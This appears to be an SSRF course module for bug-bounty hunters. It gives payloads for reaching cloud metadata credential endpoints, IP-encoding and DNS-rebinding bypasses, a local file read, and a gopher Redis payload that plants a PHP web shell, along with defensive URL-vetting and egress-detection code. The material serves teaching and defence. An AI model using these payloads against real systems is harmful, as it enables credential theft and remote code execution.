# Server-Side Request Forgery (SSRF)
SSRF tricks servers into making requests to unintended locations. It's a high-impact vulnerability that can lead to internal network access, cloud metadata theft, and RCE.
## How SSRF Works
```
User Input: https://attacker.com/image.jpg
        ↓
Application fetches URL
        ↓
Instead: http://169.254.169.254/meta-data/
        ↓
Server returns internal data to attacker
```
## Common SSRF Entry Points
| Feature | Parameter Example |
|---|---|
| URL preview | url=, link= |
| PDF generation | document_url= |
| Image fetch | image_url=, avatar= |
| Webhooks | callback_url= |
| File imports | import_url= |
| API integrations | endpoint= |
## Basic SSRF Testing
```
# Step 1: Identify URL parameters
GET /fetch?url=https://example.com
# Step 2: Test with your callback
GET /fetch?url=https://your-server.com/ssrf-test
# Step 3: Check whether the server makes the request
# Monitor your server logs for an incoming connection
# Step 4: Target internal resources
GET /fetch?url=http://127.0.0.1:80
GET /fetch?url=http://localhost/admin
GET /fetch?url=http://192.168.1.1/
```
## Cloud Metadata Exploitation
### AWS
```
# Instance metadata
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/
# Get IAM role credentials
http://169.254.169.254/latest/meta-data/iam/security-credentials/<role-name>
# User data (may contain secrets)
http://169.254.169.254/latest/user-data/
```
### GCP
```
# Requires header: Metadata-Flavor: Google
http://metadata.google.internal/computeMetadata/v1/
http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
```
### Azure
```
# Requires header: Metadata: true
http://169.254.169.254/metadata/instance?api-version=2021-02-01
http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/
```
## Bypass Techniques
### IP Address Obfuscation
```
# Decimal notation
http://2130706433/ # = 127.0.0.1
# Hex notation
http://0x7f000001/
# Octal notation
http://0177.0.0.1/
# IPv6
http://[::1]/
http://[0:0:0:0:0:0:0:1]/
# Encoded null byte in the userinfo part (parser confusion: the validator sees one host, the fetcher another)
http://127.0.0.1%00@attacker.com/
```
### DNS Rebinding
```
# Set up DNS so the name resolves differently on successive lookups
# First resolution: attacker IP (passes validation)
# Second resolution: 127.0.0.1 (actual request)
# Rebinding services (e.g. rebind.it) automate the alternating answers;
# wildcard DNS services (e.g. nip.io) simply resolve a name to the IP embedded in it
http://127.0.0.1.nip.io/
```
### Protocol Smuggling
```
# Different protocols
gopher://127.0.0.1:6379/_*1%0d%0a$4%0d%0aINFO%0d%0a # Redis
dict://127.0.0.1:11211/stats # Memcached
file:///etc/passwd # Local file read
```
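Each of the three bypass families above (IP-literal obfuscation, DNS rebinding, and non-HTTP schemes) defeats a particular kind of naive filter. The Python guard below is an added example, not code from the original page: it shows the checks a URL-fetching feature needs to resist all three at once, namely an allowlist of schemes, rejection of userinfo, canonicalization of IPv4 literals the way C `inet_aton()` reads them, a single DNS resolution whose every answer is checked, and a connection pinned to that vetted address so a second lookup can never be rebound. The names `vet_url`, `PinnedTarget`, `fetch_pinned` and `is_url_allowed` are assumptions, and the resolver is injectable so the logic can be exercised offline.

```python
"""Hardened outbound fetch (added example, not from the original page).
Allowlist schemes, reject userinfo, canonicalize IPv4 literals the way C
inet_aton() does, resolve exactly once and connect to that vetted address."""
import http.client
import ipaddress
import socket
import string
import urllib.request
from typing import NamedTuple
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}


def naive_fetch(url):
    """The vulnerable pattern: whatever the user supplied is fetched as-is."""
    return urllib.request.urlopen(url).read()


class PinnedTarget(NamedTuple):
    host: str        # name the user supplied; goes into the Host header
    port: int
    path: str
    pinned_ip: str   # the one vetted address the socket must connect to


def _inet_aton_part(part):
    """One dotted component as inet_aton() reads it: 0x hex, leading-0 octal, else decimal."""
    if part[:2].lower() == "0x":
        digits, base, ok = part[2:], 16, string.hexdigits
    else:
        digits, base, ok = part, (8 if len(part) > 1 and part[0] == "0" else 10), string.digits
    if not digits or any(c not in ok for c in digits):
        raise ValueError(part)
    return int(digits, base)


def canonical_ipv4(host):
    """Dotted quad inet_aton() would derive from host (2130706433, 0x7f000001,
    0177.0.0.1 and 127.1 all give 127.0.0.1), or None if host is not an IPv4 form."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    try:
        *lead, last = [_inet_aton_part(p) for p in parts]
    except ValueError:
        return None
    # leading parts are single bytes; the last part fills the remaining bytes
    if any(n > 255 for n in lead) or last >= 1 << (8 * (4 - len(lead))):
        return None
    value = 0
    for n in lead:
        value = (value << 8) | n
    value = (value << (8 * (4 - len(lead)))) | last
    return str(ipaddress.IPv4Address(value))


def is_forbidden(ip):
    """Anything that is not a global unicast address is off limits: loopback, RFC 1918,
    link-local (so 169.254.169.254), documentation ranges and IPv4-mapped IPv6 forms."""
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    return not ip.is_global or ip.is_multicast


def vet_url(url, resolver=socket.getaddrinfo):
    """Validate url and return a PinnedTarget; raise ValueError for anything disallowed."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:              # no file://, gopher://, dict://
        raise ValueError(f"scheme not allowed: {parts.scheme!r}")
    if parts.username is not None or parts.password is not None:
        raise ValueError("userinfo not allowed")   # ends 127.0.0.1%00@attacker.com tricks
    host = parts.hostname
    if not host:
        raise ValueError("missing host")
    port = parts.port or (443 if scheme == "https" else 80)
    v4 = canonical_ipv4(host)
    if v4 is not None:
        addrs = [ipaddress.ip_address(v4)]
    else:
        try:
            addrs = [ipaddress.ip_address(host)]   # bracketed IPv6 literal
        except ValueError:
            # resolve exactly once; the caller connects to pinned_ip and never re-resolves
            infos = resolver(host, port, type=socket.SOCK_STREAM)
            addrs = [ipaddress.ip_address(info[4][0]) for info in infos]
    if not addrs:
        raise ValueError(f"{host} did not resolve")
    for ip in addrs:                               # every answer must pass, not just the first
        if is_forbidden(ip):
            raise ValueError(f"{host} maps to disallowed address {ip}")
    path = (parts.path or "/") + (f"?{parts.query}" if parts.query else "")
    return PinnedTarget(host, port, path, str(addrs[0]))


def is_url_allowed(url, resolver=socket.getaddrinfo):
    try:
        vet_url(url, resolver)
        return True
    except (ValueError, OSError):                  # OSError covers DNS failures
        return False


def fetch_pinned(target, timeout=5):
    """Plain-HTTP fetch to the pinned IP with the original name in the Host header.
    http.client does not follow redirects, so any 3xx Location must go back through vet_url."""
    conn = http.client.HTTPConnection(target.pinned_ip, target.port, timeout=timeout)
    try:
        conn.request("GET", target.path, headers={"Host": target.host})
        resp = conn.getresponse()
        return resp.status, resp.read(1 << 20)
    finally:
        conn.close()


if __name__ == "__main__":
    for u in ("http://2130706433/", "http://0x7f000001/", "http://[::ffff:127.0.0.1]/",
              "http://127.0.0.1%00@attacker.com/", "file:///etc/passwd", "https://example.com/"):
        print(f"{u:40} allowed={is_url_allowed(u)}")
```

`fetch_pinned` covers plain HTTP only: for HTTPS the certificate must still be verified against `target.host` while the socket goes to `target.pinned_ip`, which means wrapping the socket yourself with `server_hostname=target.host` rather than handing the IP to `HTTPSConnection`. The guard also has to run again on every redirect `Location`, since a public host can answer with a 302 to an internal one.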
## Blind SSRF
When you can't see the response:
```
# Time-based detection
# Target a slow endpoint and measure response time
# Out-of-band detection
# Use Burp Collaborator or similar
url=http://<collaborator-id>.burpcollaborator.net/
# Target internal services that cause side effects
# E.g., send email, create file, modify database
```
## SSRF to RCE
### Redis (Port 6379)
```
# Using gopher protocol
gopher://127.0.0.1:6379/_*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$34%0d%0a%0a%0a<?php system($_GET['c']); ?>%0a%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$13%0d%0a/var/www/html%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$9%0d%0ashell.php%0d%0a*1%0d%0a$4%0d%0asave%0d%0a
```
### Internal Services
```
# Solr admin
http://127.0.0.1:8983/solr/admin/
# Jenkins
http://127.0.0.1:8080/script
# Elasticsearch
http://127.0.0.1:9200/_cluster/health
```
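On the defensive side, the metadata endpoint and the service ports listed in this section are exactly the destinations an egress log should never show the application tier reaching. The detector below is an added example, not code from the original page: it scans constructed JSON-lines egress records (the field names `src`, `dst_ip`, `dst_port` and `url` are assumptions about whatever proxy or host agent produces the log) and rates each hit by whether it touches 169.254.169.254, a non-public address, a non-HTTP scheme, or one of the service ports named above.

```python
"""Egress-side SSRF detection (added example; schema and log lines are constructed)."""
import ipaddress
import json
from urllib.parse import urlsplit

# The cloud metadata endpoint the page discusses.
METADATA_IPS = {ipaddress.ip_address("169.254.169.254")}
# Internal services the page names as SSRF-to-RCE pivots, keyed by default port.
SENSITIVE_PORTS = {6379: "redis", 11211: "memcached", 9200: "elasticsearch",
                   8983: "solr", 8080: "jenkins"}
ALLOWED_SCHEMES = {"http", "https"}

# Constructed sample: one JSON record per outbound request from the app tier,
# as an egress proxy or host agent might emit it (the schema is an assumption).
SAMPLE_EGRESS_LOG = """\
{"ts": "2024-05-01T10:00:01Z", "src": "web-01", "dst_ip": "93.184.216.34", "dst_port": 443, "url": "https://example.com/image.jpg"}
{"ts": "2024-05-01T10:00:02Z", "src": "web-01", "dst_ip": "169.254.169.254", "dst_port": 80, "url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/"}
{"ts": "2024-05-01T10:00:03Z", "src": "web-02", "dst_ip": "10.0.3.17", "dst_port": 6379, "url": "gopher://10.0.3.17:6379/_INFO"}
{"ts": "2024-05-01T10:00:04Z", "src": "web-02", "dst_ip": "10.0.3.18", "dst_port": 8080, "url": "http://jenkins.internal:8080/script"}
{"ts": "2024-05-01T10:00:05Z", "src": "web-01", "dst_ip": "8.8.8.8", "dst_port": 80, "url": "http://cdn.example.net/a.png"}
"""


def classify(record):
    """Return (severity, reasons) for one egress record; (None, []) when benign."""
    dst = ipaddress.ip_address(record["dst_ip"])
    port = int(record["dst_port"])
    scheme = urlsplit(record["url"]).scheme.lower()
    reasons = []
    if dst in METADATA_IPS:
        reasons.append("cloud metadata endpoint")
    elif not dst.is_global:                      # RFC 1918, loopback, link-local, ...
        reasons.append(f"non-public destination {dst}")
    if scheme not in ALLOWED_SCHEMES:            # gopher://, dict://, file:// smuggling
        reasons.append(f"non-http scheme {scheme}://")
    if port in SENSITIVE_PORTS:
        reasons.append(f"{SENSITIVE_PORTS[port]} port {port}")
    if not reasons:
        return None, []
    severity = "medium"                          # an internal host on a plain HTTP port
    if any(not r.startswith("non-public") for r in reasons):
        severity = "high"                        # odd scheme or a known pivot service
    if "cloud metadata endpoint" in reasons:
        severity = "critical"                    # credential theft is one request away
    return severity, reasons


def scan_egress_log(text):
    """Parse JSON lines and return findings in log order for an alert pipeline."""
    findings = []
    for line in text.splitlines():
        if not line.strip():
            continue
        rec = json.loads(line)
        severity, reasons = classify(rec)
        if severity:
            findings.append({"ts": rec["ts"], "src": rec["src"],
                             "dst": f"{rec['dst_ip']}:{rec['dst_port']}",
                             "severity": severity, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in scan_egress_log(SAMPLE_EGRESS_LOG):
        print(f"[{f['severity']:8}] {f['ts']} {f['src']} -> {f['dst']}: {'; '.join(f['reasons'])}")
```

The point of rating on the resolved `dst_ip` rather than on the URL string is that the obfuscated literals and rebinding names from the bypass section have already been turned into a real address by the time the connection leaves the host, so an egress-side rule is immune to them; the URL is still kept in the finding because the scheme is what separates a Redis `gopher://` write from a harmless health check.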
## Impact Demonstration
For bug reports, demonstrate concrete impact:
```markdown
## SSRF Impact Demonstration
### AWS Metadata Access
- Retrieved IAM credentials for role: webapp-prod
- Credentials allow S3 bucket listing
- 47 buckets accessible including customer-data-backup
### Internal Network Access
- Port scan revealed 3 internal web servers
- Jenkins (8080) accessible without authentication
- Redis (6379) allows unauthenticated access
```
## Real-World Bounties
| Company | Impact | Bounty |
|---|---|---|
| Shopify | AWS metadata access | $25,000 |
| GitLab | Internal network scan | $10,000 |
| Uber | Internal service access | $12,500 |
| | Cloud metadata | $15,000 |
## Testing Tips
- Check every URL parameter: even indirect ones
- Test protocol handling: file://, gopher://, dict://
- Try bypass techniques: when basic payloads fail
- Map internal network: once SSRF is confirmed, enumerate
- Chain with other bugs: SSRF + weak internal service = critical
Pro Tip: Cloud metadata is the holy grail of SSRF. Always test 169.254.169.254 first—leaked credentials often mean critical severity.
Next module: We'll explore advanced exploitation techniques.